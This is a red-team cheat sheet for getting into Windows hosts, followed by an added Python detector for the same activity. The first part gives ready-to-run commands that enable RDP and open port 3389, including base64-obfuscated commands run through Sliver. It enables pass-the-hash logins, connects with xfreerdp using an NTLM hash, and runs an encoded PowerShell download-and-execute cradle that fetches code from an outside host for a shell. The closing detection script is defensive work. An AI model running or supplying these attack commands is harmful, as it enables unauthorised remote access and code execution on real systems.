Enable RDP

1) Enable RDP and allow its port

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"

2) Encoded commands within Sliver

sharpsh -- -e -c U2V0LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAiSEtMTTpcU1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XENvbnRyb2xcVGVybWluYWwgU2VydmVyIiAtTmFtZSAiZkRlbnlUU0Nvbm5lY3Rpb25zIiAtVmFsdWUgMCAtVHlwZSBEV29yZA0K
sharpsh -- -e -c bmV0c2ggZmlyZXdhbGwgYWRkIHBvcnRvcGVuaW5nIFRDUCAzMzg5ICJSZW1vdGUgRGVza3RvcCI=

3) Allow PtH login

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
sharpsh -- -c \"New-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\" -Name DisableRestrictedAdmin -Value 0\"

4) RDP as Administrator with PtH

xfreerdp /u:Administrator /pth:a293fe16548ddab726ed3ace8cdee7ba /v:10.10.100.10 /cert:ignore /dynamic-resolution

5) Once connected over RDP, open PowerShell as admin and run the following, or use NXC, to get a shell on Sliver

powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAwAC4AMQAxAC8AaABhAHYAMABjAC0AcABzAC4AdAB4AHQAJwApACAAfAAgAEkARQBYAA==
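
Seen from the defending side, steps 1-5 leave recognisable process command lines. The following is an added example, not part of the original page: it decodes base64 arguments the way they are carried on this page (UTF-8 after `sharpsh -e -c`, UTF-16LE after `powershell -enc`) and flags the registry, firewall and download patterns shown above. The rule names, sample lines and the 192.0.2.10 host are constructed for illustration.

```python
import base64
import re

# Rule names are made up for this example; each pattern covers one step above.
RULES = {
    "rdp_enabled": re.compile(r"fDenyTSConnections.*?(?:/d|-Value)\s+0\b", re.I),
    "rdp_firewall_open": re.compile(r"netsh\s+\S*firewall\b.*\b3389\b", re.I),
    "restricted_admin_on": re.compile(r"DisableRestrictedAdmin.*?(?:/d|-Value)\s+0\b", re.I),
    "download_cradle": re.compile(r"DownloadString\(.*?\)\s*\|\s*IEX", re.I),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_views(cmdline):
    """Return the command line plus every base64 argument decoded to text."""
    views = [cmdline]
    for token in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:
            continue  # ordinary word or path fragment, not base64
        # UTF-16LE text (powershell -enc) has a zero in almost every odd byte.
        wide = len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
        views.append(raw.decode("utf-16-le" if wide else "utf-8", errors="replace"))
    return views


def triage(cmdline):
    """Names of the rules matched by the command line or a decoded argument."""
    views = decoded_views(cmdline)
    return sorted(name for name, rx in RULES.items() if any(rx.search(v) for v in views))


def encode_sample(text, encoding):
    return base64.b64encode(text.encode(encoding)).decode()


# Constructed sample command lines, as a process-creation log would record them.
SAMPLES = [
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    "sharpsh -- -e -c " + encode_sample('netsh firewall add portopening TCP 3389 "Remote Desktop"', "utf-8"),
    "powershell -enc " + encode_sample("(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/x.txt') | IEX", "utf-16-le"),
    r'reg query "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin',  # read-only, should not alert
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```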
